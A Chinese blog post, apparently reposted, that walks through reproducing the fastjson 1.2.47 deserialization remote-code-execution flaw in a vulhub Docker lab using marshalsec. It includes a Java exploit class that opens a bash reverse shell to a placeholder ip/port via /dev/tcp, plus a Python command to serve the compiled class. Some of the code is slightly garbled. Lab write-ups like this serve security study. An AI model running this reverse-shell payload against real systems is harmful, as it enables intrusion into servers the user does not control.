『』fastjson1.2.47反序列化漏洞复现
No.1 声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失 , 均由使用者本人负责 , 雷神众测以及文章作者不为此承担任何责任 。
雷神众测拥有对此文章的修改和解释权 。 如欲转载或传播此文章 , 必须保证此文章的完整性 , 包括版权声明等全部内容 。 未经雷神众测允许 , 不得任意修改或者增减此文章内容 , 不得以任何方式将其用于商业目的 。
No.2 背景
这个漏洞爆去年就爆出来了 , 一直没做啥研究 , 最近工作中发现一个应用是用来fastjson1.2.47的jar包 。 便准备复现一下该漏洞 。
No.3 环境准备
主机A:模拟Fastjson漏洞环境(centos8)
主机B:模拟攻击机(windows10)
主机C:搭设RMI 或者LDAP服务以及web服务(centos8)
先准备主机A环境 。
这里我直接使用vulhub的漏洞环境 , 需要安装docker,docker-compose等命令 。
docker安装参考https://www.jianshu.com/p/758c170b951f
在CentOS 8 上安装docker第三步会报错 , 在后边加上 --nobest就好了 。
yum install -y docker-ce --nobest
docker-compose 安装参考https://vulhub.org/#/docs/install-docker-one-click/安装完成后 , 就可以直接将github上的vulhub下载下来
本文插图
进入fastjson/1.2.47-rce/目录下 , 执行docker-compose up -d
本文插图
访问 http://ip:8090
本文插图
这样漏洞环境就准备好了 。
No.4 漏洞利用
本地环境工具准备
jdk: 链接: https://pan.baidu.com/s/1nI-JT93vjcA9--7fb0fhqw&shfl=shareset 提取码: sven
安装参考https://www.cnblogs.com/xioawu-blog/p/9097294.html
工具:marshalsec , 需要用mvn打包一下 , 建议直接使用打包好的 。
github:https://github.com/mbechler/marshalsec
链接(已打包好): https://pan.baidu.com/s/1kT9vwhNDDdiJ3dL9BS3U4w&shfl=shareset 提取码: sven
将下面代码保存为Shell .java文件 。 反弹shell_Exp:
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit throws Exception {
Process p = Runtime.getRuntime.exec(new String[]{''/bin/bash'',''-c'',''exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done''});
InputStream is = p.getInputStream;
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine) != ) {
System.out.println(line);
}
p.waitFor;
is.close;
reader.close;
p.destroy;
}
public static void main(String[] args) throws Exception {
}
}
【『』fastjson1.2.47反序列化漏洞复现】使用javac Shell.java 将代码编译成class文件 。 在该目录使用 python -m SimpleHttpServer 8090 开启一个web服务 。
本文插图
访问提示可以下载就好了 。
推荐阅读
- 小丰自媒体|Apple与Android系统齐现漏洞?
- 超能网|苹果发布iOS 13.5.1系统更新:封堵unc0ver越狱漏洞
- 漏洞|【苹果为ID验证漏洞,支付十万美元赏金】
- 威锋网|研究人员发现「使用Apple登录」功能存在安全漏洞
- 太平洋电脑网|不测不知道 这么多的USB漏洞要从何“补”起?
- 超能网|新装置发现26个USB漏洞,Linux占了18个
- 漏洞|安卓系统曝出高危漏洞,超90%用户设备被波及!
- 前瞻网|碰瓷?自称因FaceTime漏洞致手机被黑,哥伦比亚名人要求苹果赔偿26亿美元
- #漏洞#Android 9.0等低版本系统被发现存在StrandHogg 2.0漏洞
- 华为华为可以让代工厂直接发货给客户?美官员称将警惕新规漏洞